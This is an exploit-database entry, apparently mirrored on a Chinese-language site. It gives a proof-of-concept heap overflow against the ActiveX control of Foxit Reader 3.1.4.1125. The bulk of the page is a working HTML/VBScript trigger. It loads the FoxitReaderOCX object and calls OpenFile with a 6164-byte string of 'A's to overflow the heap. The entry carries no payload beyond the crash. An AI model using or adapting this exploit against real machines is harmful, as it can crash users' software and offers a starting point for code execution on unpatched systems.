Foxit Reader 3.1.4.1125 – ActiveX Heap Overflow (PoC)

  • 作者: SarBoT511 & D3V!L FUCKER
    日期: 2010-01-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11196/
  • #Vendor :www.foxitsoftware.com
    #tested on :[windows 7]
    #Foxit Reader Version 3.1.4.1125
    
    <html>
    <object classid='clsid:05563215-225C-45EB-BB34-AFA47217B1DE' id='target' ></object>
    <script language='vbscript'>
    
    targetFile = "C:\Program Files\Foxit Software\Foxit Reader\plugins\FoxitReaderOCX.ocx"
    prototype= "Function OpenFile ( ByVal strFilePath As String ) As Boolean"
    memberName = "OpenFile"
    progid = "FOXITREADEROCXLib.FoxitReaderOCX"
    argCount = 1
     
    arg1=String(6164, "A")
     
    target.OpenFile arg1 
     
    </script>